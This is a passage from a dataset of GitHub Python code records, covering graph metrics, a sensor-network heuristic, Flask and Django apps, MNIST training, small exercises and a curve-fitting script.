[i]\n for j in range(len(adj[i])):\n if adj[i][j] == 1 and visited[j] == False:\n components += dfsSCCRecurse(adj, j, visited)\n return components\n\n# Check if a graph is connected. Uses Kosaraju algorithm for BFS.\n# Input: Adjacency matrix\n# Output: Boolean\ndef isConnected(adj):\n if len(adj) == 0:\n return True\n\n if not bfs(adj):\n return False\n\n transposeAdj = transpose(adj)\n return bfs(transposeAdj)\n\n\n# Breadth first search that always starts with node 0\n# Input: Adjacency matrix\n# Output: Boolean for if it visited every node from 0 via BFS\ndef bfs(adj):\n if len(adj) == 0:\n return true\n\n explored = [0] * len(adj)\n q = Queue(len(adj) ** 2)\n q.put_nowait(0)\n\n while not q.empty():\n n = q.get_nowait() # Visit node\n if explored[n] == 0:\n explored[n] = 1\n # Find neighbors\n for neighbor in range(len(adj[n])):\n if adj[n][neighbor] > 0:\n q.put(neighbor)\n\n for nodeState in explored:\n if nodeState == 0:\n return False\n return True\n\n# Transpose an adjacency matrix\n# Input: Adjacency matrix\n# Output: Tranposed adjacency matrix\ndef transpose(adj):\n return [[adj[j][i] for j in range(len(adj))] for i in range(len(adj[0]))]\n\n# Percolation theory based robustness index: in accordance to Cohen et al. (2000) as seen in Van der Meer article\ndef percolation_limit(adj):\n adj = np.asarray(adj)\n D = np.asarray([np.sum(row) for row in adj])\n N = len(D)\n k0_avg = sum(D)/N\n k02_avg = sum(D**2)/N\n kappa = k02_avg/k0_avg\n pc = max(0,1 - (1/(kappa - 1)))\n return pc\n\n\n\n## Entropy as a robustness metric\n# Von Neumann Entropy of the graph\ndef VN_Entropy(adj):\n adj = np.asarray(adj)\n D = np.diag(np.array([np.sum(row) for row in adj]))\n N = len(D)\n L = D - adj\n Dtemp = D.tolist()\n Dtemp = [item for sublist in Dtemp for item in sublist]\n D5 = [(item**(-.5) if item > 0 else 0) for item in Dtemp] # works because diagonal matrix - otherwise would have to use inverse for negation\n D5 = np.asarray(D5)\n D5.shape = (N, N)\n Lhat = np.asmatrix(D5) * np.asmatrix(L) * np.asmatrix(D5)\n rho = Lhat / N\n Hvn = -np.trace(np.asmatrix(rho) * scipy.linalg.logm(np.asmatrix(rho)))\n return Hvn\n\n## Degree distribution Entropy: Only non-weighted adjacency\n# Same importance == Highest entropy. Importance <-> Degree dependent\ndef Entropy_imp(adj):\n adj = np.asarray(adj)\n D = np.asarray([np.sum(row) for row in adj])\n N = len(D)\n Dn = D/sum(D)\n return -sum(Dn*np.log2(Dn))\n\n# More diverse degree distribution, greater the entropy\ndef Degree_Entropy(adj):\n Pn = Degree_Distribution(adj)\n ndeg = len(Pn)\n S = 0\n for i in range(ndeg):\n if Pn[i]!=0:\n S = S - Pn[i]*np.log2(Pn[i])\n\n return S\n # P = zeros(N,N) # Probability matrix, Pij is the probability that ith node has degree j\n\n## Graph characteristics\ndef Degree_Distribution(adj):\n #adj should be int type \n adj = np.asarray(adj)\n D = np.asarray([np.sum(row) for row in adj])\n P = np.bincount(D)\n return P/sum(P)\n\n# def Clustering(adj):\n","repo_name":"Columbia-CRIS/Intern","sub_path":"Adaptive-Complex-Networks/Network-Analysis/Evaluator/evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":9391,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"22252803705","text":"class Person:\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n def say_hello(self):\n print(f'Hello, my name is {self.name} and I am {self.age} years old')\n\n\nif __name__ == '__main__':\n Miguel = Person('Miguel', 22)\n\n print(f'Age: {Miguel.age}')\n print(f'Name: {Miguel.name}')\n Miguel.say_hello()","repo_name":"Mike-droid/crud-python","sub_path":"personas.py","file_name":"personas.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34812631590","text":"from wusn.commons import WusnOutput, WusnInput\n\n\ndef lurns1(inp: WusnInput) -> WusnOutput:\n sensors = inp.sensors\n in_relays = inp.relays[:]\n Y = inp.relay_num\n out_relays = []\n out_relays_to_sensors = {}\n loss = inp.loss # L(sn, rn) = loss[(sn, rn)]\n\n print(\"Starting LURNS-1...\")\n while len(out_relays) < Y:\n min_T = float(\"inf\")\n best_rn = None\n for fq in in_relays:\n losses = []\n for id1, sn in enumerate(sensors):\n Ts = float('inf')\n for rn in out_relays + [fq]:\n ls = loss[(sn, rn)]\n if ls < Ts:\n Ts = ls\n losses.append(Ts)\n Tc = max(losses)\n if Tc < min_T:\n min_T = Tc\n best_rn = fq\n print('[%d] Picked relay: %s' % (len(out_relays), best_rn))\n out_relays.append(best_rn)\n in_relays.remove(best_rn)\n\n # Gan cac sn cho rn\n for rn in out_relays:\n out_relays_to_sensors[rn] = []\n\n for sn in sensors:\n t_min = float(\"inf\")\n best_rn = None\n for rn in out_relays:\n ls = loss[(sn, rn)]\n if ls < t_min:\n t_min = ls\n best_rn = rn\n out_relays_to_sensors[best_rn].append(sn)\n\n # Ket qua\n out = WusnOutput(inp, sensors, out_relays, out_relays_to_sensors)\n return out\n","repo_name":"lanPN85/wusn","sub_path":"wusn/yuan/lurns/lurns1.py","file_name":"lurns1.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"16260005625","text":"\nimport numpy\nimport pandas as pd\nimport datetime as dt\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\nfrom flask import Flask, jsonify\n\n# Database Setup\n## reflect an existing database into a new model\nengine = create_engine('sqlite:///Resources/hawaii.sqlite')\nBase = automap_base()\n# reflect the tables\nBase.prepare(engine, reflect=True)\n\n# Save references to each tables\nMeasurement = Base.classes.measurement\nstation = Base.classes.station\n# Create our session (link) from Python to the DB\nsession = Session(engine)\n\n# Create a Flask app\napp = Flask(__name__)\n\n# Flask Routes\n@app.route(\"/\")\ndef home():\n print(\"Server requested climate app home page...\")\n return (\n f\"Welcome to the Climate Analysis App!
\"\n f\"----------------------------------
\"\n f\"Available Routes:
\"\n f\"/api/v1.0/precipitation
\"\n f\"/api/v1.0/stations
\"\n )\n\n@app.route(\"/api/v1.0/precipitation\")\ndef precipitation(): \n # Calculate the date one year from the last date in data set.\n prev_year = dt.date(2017,8,23) - dt.timedelta(days=365) \n\n # query to retrieve all the date and precipitation values\n results = session.query(Measurement.date, Measurement.prcp).\\\n filter(Measurement.date >= prev_year).all()\n \n #Dictionary with date as the key and prcp as the value\n precip = {date: prcp for date, prcp in results}\n return jsonify(precip)\n\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n #results = session.query(Station.station).all()\n results = session.query(station.id, station.station, station.name).all()\n\n list_stations = []\n \n for st in results:\n station_dict = {}\n\n station_dict[\"id\"] = st[0]\n station_dict[\"station\"] = st[1]\n station_dict[\"name\"] = st[2]\n\n list_stations.append(station_dict)\n\n # Return a JSON list of stations from the dataset.\n return jsonify(list_stations) \n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"LiteshSamji/sqlalchemy-challenge","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13664887355","text":"from .base import * # noqa\n\nDEBUG = True\n\nALLOWED_HOSTS = [\"*\"]\n\nINSTALLED_APPS += [\"debug_toolbar\"] # noqa\n\nMIDDLEWARE += [\"debug_toolbar.middleware.DebugToolbarMiddleware\"] # noqa\n\nDEBUG_TOOLBAR_CONFIG = {\n \"SHOW_TOOLBAR_CALLBACK\": (\n lambda request: request.headers.get(\"x-requested-with\") != \"XMLHttpRequest\"\n and request.path != \"/\" # noqa: E731\n )\n}\n\n\nEMAIL_BACKEND = \"django.core.mail.backends.smtp.EmailBackend\"\n\nEMAIL_HOST = \"smtp-server\"\nEMAIL_PORT = \"1025\"\n","repo_name":"bjvta/iainteractive-python","sub_path":"src/iainteractive/settings/develop.py","file_name":"develop.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18575205238","text":"import json\n\ndicionario = {\n \"chaves\" : [\"Chaves do 8\", \"14/04/2016\", \"Recep_01\"],\n \"quico\" : [\"Quico das Flores\", \"24/12/2017\", \"Raiox_03\"],\n \"florinda\" : [\"Dona Florinda\", \"18/12/2017\", \"Raiox_02\"]\n}\n\nwith open(\"db1.json\", \"w\") as json_file:\n json.dump(dicionario, json_file)","repo_name":"dihogoteixeira/fiap-ctp-exercises","sub_path":"Manipulacao_Arquivos/ManageJsonFile.py","file_name":"ManageJsonFile.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29461177989","text":"def jerigonzo(texto):\n resultado = \"\"\n for caracter in texto:\n if caracter.lower() in \"aeiouáéíóú\":\n resultado += caracter + \"p\" + caracter.lower()\n else:\n resultado += caracter\n return resultado\n\nif __name__ == \"__main__\":\n texto = input(\"Ingrese un texto: \")\n resultado_jerigonzo = jerigonzo(texto)\n print(\"Texto traducido al jerigonzo:\", resultado_jerigonzo)\n\n ","repo_name":"pabloschwarzenberg/grader","sub_path":"tema4_ej3/tema4_ej3_649009ada26aa1068e83e02c64d93189.py","file_name":"tema4_ej3_649009ada26aa1068e83e02c64d93189.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38885237855","text":"import json\n\nfrom django.http import JsonResponse\nfrom django.utils.decorators import decorator_from_middleware\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\n\nfrom ...middleware.auth_strategy import AuthStrategyMiddleware\nfrom ..models import EndUser, Location\nfrom ..serializers import LocationSerializer\n\n\n@csrf_exempt\n@api_view(['DELETE'])\n@decorator_from_middleware(AuthStrategyMiddleware)\ndef delete_existing_location(request, location_id):\n try:\n existing_location = Location.objects.get(\n id=location_id, user__id=request.user.id)\n existing_location.delete()\n return JsonResponse({\n 'success': True,\n 'message': 'Successfully deleted location for user'\n }, status=status.HTTP_200_OK)\n except Location.DoesNotExist:\n return JsonResponse({\n 'success': False,\n 'message': 'Location with given id does not exist'\n }, status=status.HTTP_400_BAD_REQUEST)\n except Exception as e:\n return JsonResponse({\n 'success': False,\n 'message': str(e)\n }, status=status.HTTP_404_NOT_FOUND)\n\n\n@csrf_exempt\n@api_view(['PATCH'])\n@decorator_from_middleware(AuthStrategyMiddleware)\ndef edit_existing_location(request, location_id):\n data = json.loads(request.body)\n try:\n existing_location = Location.objects.get(\n id=location_id, user__id=request.user.id)\n if 'location' in data:\n existing_location.location = data['location']\n if 'start_year' in data:\n existing_location.start_year = data['start_year']\n if 'end_year' in data:\n existing_location.end_year = data['end_year']\n return JsonResponse({\n 'success': True,\n 'message': 'Successfully updated existing location data',\n 'location': LocationSerializer(existing_location).data\n }, status=status.HTTP_202_ACCEPTED)\n except Location.DoesNotExist:\n return JsonResponse({\n 'success': False,\n 'message': 'Location with given id does not exist'\n }, status=status.HTTP_400_BAD_REQUEST)\n except Exception as e:\n return JsonResponse({\n 'success': False,\n 'message': str(e)\n }, status=status.HTTP_404_NOT_FOUND)\n\n\n@csrf_exempt\n@api_view(['PUT'])\n@decorator_from_middleware(AuthStrategyMiddleware)\ndef add_new_location(request):\n data = json.loads(request.body)\n try:\n location = data['location']\n start_year = data['start_year']\n end_year = None\n if 'end_year' in data:\n end_year = data['end_year']\n location_count = Location.objects.filter(\n user__id=request.user.id).count()\n if location_count >= 3:\n return JsonResponse({\n 'success': False,\n 'message': 'Only recent 3 location data are allowed. Please delete other locations and then add new one'\n }, status=status.HTTP_403_FORBIDDEN)\n endUser = request.user\n new_location = Location.objects.create(\n user=endUser, location=location, start_year=start_year, end_year=end_year)\n return JsonResponse({\n 'success': True,\n 'message': 'Successfully added new location',\n 'location': LocationSerializer(new_location).data\n }, status=status.HTTP_201_CREATED)\n except KeyError:\n return JsonResponse({\n 'success': False,\n 'message': 'Please provide all data'\n }, status=status.HTTP_400_BAD_REQUEST)\n except Exception as e:\n return JsonResponse({\n 'success': False,\n 'message': str(e)\n }, status=status.HTTP_404_NOT_FOUND)\n","repo_name":"souptik4572/JustAskIt","sub_path":"api/user/views/location.py","file_name":"location.py","file_ext":"py","file_size_in_byte":3799,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"26140792514","text":"'''\r\n本题要找第k大的元素。\r\npython中有heapq模块,可以通过heapq.heapify(list)来建一个最小堆,\r\n这样heapq.heappop(list)每次弹出的都是优先级最小的元素。总时间复杂度O(nlogN)。\r\n程序运行时间为44ms,击败94.56%的用户。\r\n'''\r\nimport heapq\r\ndef findKthLargest(nums, k):\r\n\t\"\"\"\r\n\t:type nums: List[int]\r\n\t:type k: int\r\n\t:rtype: int\r\n\t\"\"\"\r\n\theapq.heapify(nums)\r\n\tfor i in range(len(nums)-k): \r\n\t\theapq.heappop(nums)\r\n\treturn heapq.heappop(nums)\r\n\r\n'''\r\n但上题的解法用到了python中已有的模块。\r\n如果不用已有的堆模块,则可以借助快速排序的思想,时间复杂度同样为O(nlogN)。\r\n运行时间同样为44ms。\r\n'''\r\nfrom random import randint\r\ndef findKthLargest(nums, k):\r\n pivot = randint(0 , len(nums) - 1) #随机产生一个用来比较的数\r\n left = [l for l in nums if l < nums[pivot]]\r\n equal = [e for e in nums if e == nums[pivot]]\r\n right = [r for r in nums if r > nums[pivot]]\r\n\r\n if k <= len(right): #第K大数在大于随机数的列表\r\n return findKthLargest(right, k)\r\n elif (k - len(right)) <= len(equal):\r\n return equal[0]\r\n else:\r\n return findKthLargest(left, k - len(right) - len(equal))\r\n","repo_name":"justanewbieC/cc-leetcode","sub_path":"LeetCode 201-300/215-Kth-Largest-Element-in-an-Array.py","file_name":"215-Kth-Largest-Element-in-an-Array.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"19176468706","text":"from flask import Flask\nfrom flask import render_template\nfrom flask import request\napp = Flask(__name__)\n\n@app.route('/planets', methods=['POST', 'GET'])\ndef planets():\n\tsearchword = request.args.get('search', '')\n\tif (searchword == 'Mars'):\n\t\treturn render_template('deathstarcustom2.html')\n\telse:\n\t\treturn render_template('deathstarcustom.html')\n\n\nif __name__ == '__main__':\n app.run()","repo_name":"sambeckett303/RapidPrototyping","sub_path":"flask/deathstar.py","file_name":"deathstar.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19857555068","text":"import math\nimport pickle\nimport sys\nfrom typing import Optional, Callable\n\nimport pyro\nimport pyro.distributions as dist\nimport torch\nfrom pyro import nn\nfrom pyro.infer import SVI, Trace_ELBO\nfrom pyro.infer.autoguide import AutoDiagonalNormal\nfrom torch.optim import Adam\nfrom torch.utils.data import DataLoader, Dataset\nfrom torchvision import datasets, transforms\nfrom tqdm import tqdm\nimport numpy as np\nimport torch.nn.functional as F\n\nfrom bnn_utils import *\n\npyro.set_rng_seed(101)\n\n\ndef test_nn(model, test_loader):\n correct = []\n with torch.no_grad():\n for i, batch in enumerate(test_loader):\n probs = model(batch[0])\n y_pred = torch.argmax(probs, dim=1)\n correct.append(y_pred == batch[1])\n correct = torch.cat(correct)\n acc = correct.to(dtype=torch.float32).mean().item()\n return acc\n\n\ndef train_nn(model, train_loader, val_loader, num_epochs=1, learning_rate=1e-3):\n len_train = len(train_loader)\n pbar = tqdm(range(num_epochs * len_train))\n losses = []\n accs = []\n acc = 0\n\n optimizer = Adam(model.parameters(), lr=learning_rate)\n\n for epoch in range(num_epochs):\n for i, batch in enumerate(train_loader):\n optimizer.zero_grad()\n\n prediction = model(batch[0])\n loss = F.cross_entropy(prediction, batch[1])\n loss.backward()\n optimizer.step()\n\n losses.append(loss)\n pbar.update()\n pbar.set_postfix_str(f\"e={epoch+1}, b={(i+1):d}/{len_train:d}, loss={loss:.3f}, acc={acc:.3f}\")\n acc = test_nn(model, val_loader)\n accs.append(acc)\n\n sys.stderr.flush()\n sys.stdout.flush()\n print()\n return losses, acc, accs\n\n\ndef tune_nn_hyperparameters():\n train_dataset = MNIST_50('./data', train=True, download=True, transform=transforms.Compose([transforms.ToTensor(), ]), length=50000)\n val_dataset = MNIST_50('./data', train=True, download=True, transform=transforms.Compose([transforms.ToTensor(), ]), length=10000, offset=50000)\n test_dataset = datasets.MNIST('./data', train=False, download=True, transform=transforms.Compose([transforms.ToTensor(), ]))\n\n train_loader = DataLoader(train_dataset, batch_size=500, shuffle=False)\n val_loader = DataLoader(val_dataset, batch_size=500, shuffle=False)\n test_loader = DataLoader(test_dataset, batch_size=500, shuffle=False)\n\n\n lrs = torch.tensor([5e-4, 1e-3, 5e-3, 1e-2])\n # lrs = torch.tensor([1e-2])\n\n accss = []\n best_final_acc = 0\n best_index = 0\n best_model = None\n best_lr = 0\n\n for i, lr in enumerate(lrs):\n model = NN(28*28, 100, 10)\n _, acc, accs = train_nn(model, train_loader, val_loader, num_epochs=20, learning_rate=lr)\n accss.append(accs)\n print(f\"LR={lr}, acc={acc:.3f}\")\n\n if acc >= best_final_acc:\n best_final_acc = acc\n best_model = model\n best_index = i\n best_lr = lr\n\n print(f\"Best lr={best_lr}\")\n\n np.savetxt(\"results/accs_nn.csv\", np.array(accss[best_index]))\n\n test_acc = test_nn(model, test_loader)\n print(f\"Final test acc={test_acc:.3f}\")\n\n with open(f\"results/nn.pkl\", \"wb\") as f:\n pickle.dump(best_model, file=f)\n\nif __name__ == \"__main__\":\n print(\"Choose an experiment from above to run\")\n tune_nn_hyperparameters()\n","repo_name":"ATMLGroup1-2021/SGHMC","sub_path":"experiments/mnist_nn.py","file_name":"mnist_nn.py","file_ext":"py","file_size_in_byte":3345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27815885214","text":"\"\"\"Test Initialise Command.\"\"\"\nimport logging\nimport pathlib\nimport subprocess # nosec\nimport typing\n\nimport click.testing\n\nimport templatise.initialise as sut\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass TestMain:\n \"\"\"Test Main Command.\"\"\"\n\n def test_help(self) -> None:\n \"\"\"Test --help.\"\"\"\n runner = click.testing.CliRunner()\n result = runner.invoke(cli=sut.main, args=[\"--help\"])\n assert result.exit_code == 0 # nosec\n\n def test_mock_initialisation(self, project_path: pathlib.Path) -> None:\n \"\"\"Test the whole process with a copy of the working tree.\"\"\"\n runner = click.testing.CliRunner()\n\n result = runner.invoke(\n cli=sut.main,\n args=[\n \"--project-name\",\n \"sentinel\",\n \"--path\",\n str(project_path),\n \"--verbosity\",\n \"DEBUG\",\n ],\n )\n\n _LOGGER.debug(\"result.output:\\n%s\", result.output)\n _LOGGER.debug(\"result.exception: %s\", result.exception)\n _LOGGER.debug(\"result.exc_info: %s\", result.exc_info)\n\n assert result.exit_code == 0 # nosec\n\n assert not (project_path / \"templatise\").exists() # nosec\n assert not (project_path / \"templatise_test\").exists() # nosec\n\n assert (project_path / \"sentinel\").exists() # nosec\n assert (project_path / \"sentinel_test\").exists() # nosec\n\n grep = _grep(\n patterns=[\"template.py\", \"template_py\"],\n paths=[project_path],\n options=[\"--invert-match\", \"--recursive\", \"--quiet\"],\n )\n assert grep.returncode == 0 # nosec\n\n\ndef _grep(\n patterns: typing.List[str],\n paths: typing.List[pathlib.Path],\n options: typing.Optional[typing.List[str]] = None,\n): # type: (...) -> subprocess.CompletedProcess[str]\n if not options:\n options = []\n\n result = subprocess.run( # pylint: disable=W1510 # nosec\n [\"grep\", *options, *[f\"-e {pattern}\" for pattern in patterns], *paths],\n capture_output=True,\n text=True,\n )\n\n return result\n","repo_name":"alunduil/template.py","sub_path":"templatise_test/initialise_test.py","file_name":"initialise_test.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"36024923203","text":"# identify data type of values\n# 56, 56.0, \"56\", \"ravi kumar\", 7.8, \"7.8\", 98\n# 1 2 3 4 5 6 7\n\n#2 identify no of variables, values and their data types\na = \"ravi\"\t\t\t\t\t#2.1\nb = 6\t\t\t\t\t\t#2.2\nc = 2\t\t\t\t\t\t#2.3\ndiv = a/b\t\t\t\t\t#2.4\nprint(b, \"/\", c, \"=\", div)\t#2.5\nprint(b, \"+\", c, \"=\", b+c)\t#2.6\t\n\n#identify value, datatype and function\n# 75, int(), int, 3.2, float(), float, str, \"ravi\" , str()\n# 4.1 4.2 4.3 4.4 4.5 4.6 4.7 4.8 4.9 \n\n# var name, its type, value, who give it that val, what function does\na = int(4.7)\t\t\t\t#4.1\nc = float(5)\t\t\t\t#4.2\nf = str(4.2)\t\t\t\t#4.3\nd = float(\"4\")\t\t\t\t#4.4\ne = int(\"3.4\")\t\t\t\t#4.5\n\n#user input\na = input(\"enter number \") #5.1\nprint(a) \t\t\t\t#5.2\n\n#6 comment\na = 7\t\t\t\t\t\t#6.1 \n#a = 2\t\t\t\t\t\t#6.2\nprint(a)\t\t\t\t\t#6.3\n#print(\"hello\")\t\t\t\t#6.4\n\n#7 multi line comment\na = 1\t\t\t\t\t\t#7.1\n'''\na = 2\t\t\t\t\t\t#7.2\na= 3 \n'''\nprint(a)\t\t\t\t\t#7.4\n","repo_name":"parvezk-code/Library","sub_path":"polytechnic/subjects/python/tutorials/revision/rev_01.py","file_name":"rev_01.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24993026064","text":"import pandas as pd \nimport numpy as np \n\ndef main(dis_num):\n\tdata = {}\n\tfor i in range(1, 26):\n\t\tdata[i] = pd.read_csv('../output_s'+str(i)+'/expt1.2/d'+str(dis_num)+'.csv', error_bad_lines=False)\n\t\tdata[i] = data[i].sort_values(\"Power Divergence\").groupby(\"Lambda\", as_index=False).first()\n\t\tdata[i]['Dataset']=str(i)\n\t\n\tresult = pd.concat(data, ignore_index=True)\n\tresult = result.sort_values('Lambda')\n\tresult.to_csv('d'+str(dis_num)+'_rq4.1.csv')\n\nmain(15)","repo_name":"prasri92/MaxEnt","sub_path":"src/rq4.1.py","file_name":"rq4.1.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"69924359930","text":"#!/usr/bin/env python3\n\n\"\"\" This script can either otuput a plot of a given ID or the AIC results of multiple linear \nand non linear models of temperature performance curves \"\"\"\n\n__appname__ = 'npMod.py'\n__author__ = 'Tristan JC (tjc19@ic.ac.uk)'\n__version__ = '0.0.Godknows'\n\n## imports ##\nimport sys # module to interface our program with the operating system\nfrom lmfit import Minimizer, Parameters, report_fit\nimport numpy as np\nimport scipy.stats\nfrom scipy.stats import linregress\nimport matplotlib.pylab as p\nimport pandas as pd\nimport math\nfrom csv import writer\n\n## constants ##\nk = 8.617e-5\n\n## functions ##\ndef residuals_quad(params, t, data):\n\t\"\"\"Calculate quadratic growth and subtract data\"\"\"\n\t\n\t#Get an ordered dictionary of parameter values\n\tv = params.valuesdict()\n\t\n\t#Cubic model\n\tmodel = v['a']*t**2 + v['b']*t + v['c']\n\n\treturn model - data #Return residuals\n\ndef residuals_Briere(params, t, data):\n\t'''Fit a Breire model and subtract data'''\n\t#Get an ordered dictionary of parameter values\n\tv = params.valuesdict()\n\n\tmodel = v['B'] * t * (t - v['t0']) * ((v['tm'] - t) ** (1/v['m']))\n\t#Return residuals\n\treturn model - data\n\ndef residuals_school(params, t, data):\n\t'''Fit a Breire model and subtract data'''\n\t#Get an ordered dictionary of parameter values\n\tv = params.valuesdict()\n\n\tmodel = (v['B0'] * np.exp((-v['E']/k) * ((1/t) - (1/283.15))) ) / (1 + np.exp((v['El']/k) * ((1/v['Tl']) - (1/t))) + np.exp((v['Eh']/k) * ((1/v['Th']) - (1/t))))\n\t#Return residuals\n\treturn model - data\n\ndef Define_Parameters(labels, values):\n\t\"\"\"Function for simplifying process of defining parameters\"\"\"\n\tpar_linear = Parameters()\n\n\tfor i in range(len(labels)):\n\t\t#Add parameters and initial values to it\n\t\tpar_linear.add( labels[i], value = values[i])\n\n\treturn par_linear\n\ndef Starting_vals_school(x, Ran = False):\n\t\"\"\" Find starting values for Schoolfield model parameters \"\"\"\n\tn = len(x)\n\tlin = linregress(x[0:2,1], x[0:2,2])\n\tB0 = abs(lin[0])*283.15 + lin[1]\n\tif B0 < 0 :\n\t\tB0 = 5\n\tEee = np.log(B0) - x[2,2]/(1/((x[2,1])*k) - 1/283.15)\n\n\tmAx = max(x[:,2])\n\tmAxI = np.argmax(x[:,2])\n\tTh = np.mean(x[(np.abs(x[mAxI:,2] - mAx/2)).argmin()])\n\tTl = np.mean(x[(np.abs(x[:mAxI,2] - mAx/2)).argmin()])\n\tEl = -Eee \n\tE = Eee \n\tEh = Eee \n\tif Tl <=0 or Th <= 0 or Eee == 0 :\n\t\tRan = True\n\t\n\tif Ran:\n\t\t#Randomify:\n\t\tB0 = np.random.uniform(0, 20, size = 1)\n\t\tEl = np.random.uniform(-3, 0, size = 1)\n\t\tEh = np.random.uniform(0, 3, size = 1)\n\t\tTl = np.random.uniform(200, 300, size = 1)\n\t\tTh = np.random.uniform(300, 400, size = 1)\n\t\tE = np.random.uniform(-1.5, 1.5, size = 1)\n\t\n\t#Define and outparams_school = Parameters()\n\tparams_school = Parameters()\n\tparams_school.add('B0', value = B0, min = -100, max = 100)\n\tparams_school.add('El', value = El, min = -100, max = 0)\n\tparams_school.add('Eh', value = Eh, min = 0, max = 100)\n\tparams_school.add('Tl', value = Tl, min = 0, max = 300)\n\tparams_school.add('Th', value = Th, min = 100, max = 400)\n\tparams_school.add('E', value = E, min = -100, max = 100)\n\treturn params_school\n\ndef Starting_vals_Briere(x, Ran = False):\n\t\"\"\" Find starting values for Schoolfield model parameters \"\"\"\n\t\n\tB = 1\n\ttmin = min(x[:,1])\n\ttmax = max(x[:,1])\n\tt0 = tmin\n\ttm = tmax\n\tm = 2\n\n\tif Ran == True:\n\t\t#Randomify: \n\t\tB = np.random.uniform(-10, 10, size = 1)\n\t\tt0 = np.random.uniform(200, tmin, size = 1) \n\t\ttm = np.random.uniform(tmax, 400, size = 1)\n\t\tm = np.random.uniform(1, 5, size = 1)\n\t\n\t#Define and outparams_school = Parameters()\n\tparams_school = Parameters()\n\tparams_school.add('B', value = B, min = -100, max = 100)\n\tparams_school.add('t0', value = t0, min = 0, max = tmin)\n\tparams_school.add('tm', value = tm, min = tmax, max = 1000)\n\tparams_school.add('m', value = m, min = 1, max = 10)\n\treturn params_school\n\ndef variance(data):\n\t# Number of observations\n\tn = len(data)\n\t# Mean of the data\n\tmean = sum(data) / n\n\t# Square deviations\n\tdeviations = [(x - mean) ** 2 for x in data]\n\t# Variance\n\tvariance = sum(deviations) / n\n\treturn variance\n\ndef Lin_Mod(Data, ID, plot):\n\t\"\"\" Outputs parameter estimates and AIC for a given model and starting values \"\"\"\n\tType = ['Schoolfield', 'Briere', 'Quadratic']\n\tColour = ['purple', 'green', 'orange']\n\ttmp = Data[Data[:,0]==ID]\n\t# array for AIC scores\n\tScores = np.zeros(6)\n\tescaping = np.zeros(6)\n\tif len(tmp) < 6 :\n\t\tprint('ID: ', ID, ' sample size is: ', len(tmp), ' so skipped')\n\t\treturn escaping\n\t\n\t#Shift data up\n\tshifty = 0\n\tif min(tmp[:,2]) < 0 :\n\t\tshifty = abs(min(tmp[:,2]))\n\t\ttmp[:,2] = tmp[:,2] + shifty\n\t\n\ttmp[:,1] = 273.15+tmp[:,1]\n\tminT = min(tmp[:,1])\n\tmaxT = max(tmp[:,1])\n\n\tfor i in Type :\n\t\t\t\t\t\t\t\n\t\tif i == 'Quadratic':\n\t\t\tcolour = Colour[2]\n\t\t\tresid = residuals_quad \n\t\t\tparams = Define_Parameters(['a','b','c'], [2,2,2])\n\t\t\tj = 3\n\t\t\t\n\t\t\t#create minimzer object\n\t\t\tminner = Minimizer(resid, params, fcn_args=(tmp[:,1], tmp[:,2]))\n\t\t\t\t\t\t\n\t\t\t#Perform the minimization\n\t\t\tbest_mod = minner.minimize(method = 'leastsq')\n\n\t\t\tF = variance(best_mod.residual)/variance(tmp[:,2])\n\t\t\talpha = 0.05\n\t\t\tp_value = scipy.stats.f.cdf(F, len(tmp)-1, len(tmp)-1)\n\t\t\tif p_value > alpha:\n\t\t\t\tprint(\"ID \", ID, \" Not significant\")\n\t\t\t\treturn escaping\n\t\t\tScores[j] = best_mod.aic\n\n\t\tif i == 'Schoolfield':\n\t\t\tcolour = Colour[0]\n\t\t\tresid = residuals_school\n\t\t\tparams = Starting_vals_school(tmp)\n\t\t\tj = 1\n\t\t\t\n\t\t\t#create minimzer object\n\t\t\tminner = Minimizer(resid, params, fcn_args=(tmp[:,1], tmp[:,2]))\n\t\t\t\t\t\n\t\t\t#Perform the minimization\n\t\t\tfit_Mod = minner.minimize(method = 'leastsq')\n\t\t\tbest_mod = fit_Mod\n\t\t\tbest_score = fit_Mod.aic\n\t\t\tScores[j] = fit_Mod.aic\n\n\t\t\tfor l in range(10):\n\t\t\t\ttry:\n\t\t\t\t\tparams = Starting_vals_school(tmp, True)\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t#create minimzer object\n\t\t\t\t\tminner = 